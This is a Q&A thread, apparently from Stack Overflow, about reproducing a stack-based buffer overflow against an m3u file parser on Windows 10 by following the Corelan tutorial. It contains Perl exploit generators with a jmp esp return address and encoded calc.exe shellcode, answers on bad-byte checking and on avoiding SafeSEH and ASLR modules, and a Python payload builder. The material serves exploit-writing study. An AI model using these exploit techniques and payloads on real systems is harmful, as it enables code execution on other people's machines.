Reputation: 13
I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.
Firstly, I found the position of EIP was after the 26089 As (at 0016F454), and the ESP was 4 characters after EIP (at 0016F45C) according to the following code:
use strict;
use warnings;
my $file = "eipcrash.m3u";
my $junk = "A" x 26089;
my $eip = pack('V', 0x444444);   # little-endian DWORD that lands in EIP
my $shellcode = "\x90" x 4;      # NOP bytes; ESP points here after the overflow
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);                  # write raw bytes, no newline translation
print $FILE $junk . $eip . $shellcode;
close($FILE);
Results: https://i.sstatic.net/LmPG8.png
I find the pointer to the jmp esp instruction by !mona find -type instr -s "jmp esp" -x X. I use the 0x7457AC5B one.
Results: https://i.sstatic.net/iUoVY.png
I carefully made sure everything looked like it was working. Finalized code:
use strict;
use warnings;
my $file = "eipcrash.m3u";
my $junk = "A" x 26089;
my $eip = pack('V', 0x7457AC5B); # jmp esp address; also tried 0x6F90E8EC 0x1001B058
my $shellcode = "\x90" x 4;      # NOP sled, ESP lands here
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);                  # raw bytes; avoid any newline translation
print $FILE $junk . $eip . $shellcode;
close($FILE);
print "m3u File Created successfully\n";
Final results: https://i.sstatic.net/JSwKt.png
It just doesn't work! I believe that my EIP and position of shellcode are correct, so the problem might be the effectiveness of the shellcode. I tried shellcodes for launching calc.exe from a different website, but none worked.
Why isn't it working? I'm using Windows 10 x64. Please guide me since I've been stuck on this for weeks, and I have scrutinized similar problems' articles on the web. I've really got no idea.
Thanks in advance.
Upvotes: 1
Views: 2298
Reputation: 121
Did you check for bad bytes? Quite often certain bytes are used by file parsers as magic markers and can cause your shellcode to not be copied in full or translated to corrupt shell code. You can use the bytearray feature of mona to assist you with identifying bad bytes (https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/)
Upvotes: 0
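As an added illustration (not code from the question, this answer, or the Corelan tutorial), here is a Python port of the question's file layout with the kind of bad-byte check this answer recommends: it reports what lands in EIP and at ESP, flags suspect bytes in the address and shellcode, and builds the byte-array probe used for a memory compare. The BAD_BYTES set is an assumption; the real set must be confirmed against the target parser.

```python
import struct

# Assumed terminators that text/m3u parsers commonly mangle; confirm per target
# with a bytearray probe and a memory compare (as mona's bytearray/compare do).
BAD_BYTES = frozenset({0x00, 0x0a, 0x0d})

def build_payload(junk_len, ret_addr, nop_len, shellcode):
    """Same layout as the question's Perl script: junk + EIP + NOPs + shellcode.
    struct '<I' is the equivalent of Perl's pack('V') (little-endian DWORD)."""
    return b"A" * junk_len + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode

def inspect_payload(payload, junk_len, nop_len):
    """Report what the overflow places in EIP and at ESP, plus any bad bytes."""
    eip_bytes = payload[junk_len:junk_len + 4]
    body = payload[junk_len + 4 + nop_len:]       # bytes that follow the NOP sled
    return {
        "eip": struct.unpack("<I", eip_bytes)[0],
        "eip_bytes_on_disk": eip_bytes.hex(),       # byte order as written to file
        "esp_offset_from_eip": 4,                   # matches 0016F454 -> 0016F45C
        "bad_in_eip": sorted(b for b in eip_bytes if b in BAD_BYTES),
        "bad_in_shellcode": sorted({b for b in body if b in BAD_BYTES}),
        "shellcode_len": len(body),
    }

def bytearray_probe(excluded=BAD_BYTES):
    """All 256 byte values minus the excluded ones, in order. Written in place of
    the shellcode, it lets a memory dump show which bytes the parser altered."""
    return bytes(b for b in range(256) if b not in excluded)

def first_mismatch(expected, observed):
    """(index, expected byte) of the first deviation of a memory dump from the
    probe that was written to the file, or None if the dump matches in full."""
    for i, (e, o) in enumerate(zip(expected, observed)):
        if e != o:
            return i, e
    if len(observed) < len(expected):
        return len(observed), expected[len(observed)]
    return None

if __name__ == "__main__":
    # Constructed sample: a short fake shellcode containing a 0x0a byte.
    sample = b"\xdb\xc0\x31\xc9\x0a\xff"
    payload = build_payload(26089, 0x7457AC5B, 4, sample)
    print(inspect_payload(payload, 26089, 4))
```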
Reputation: 697
pvefindaddr j -r esp -n -o (Immunity Debugger or anything). And it's always better to avoid "SafeSEH" and "ASLR".
Upvotes: 1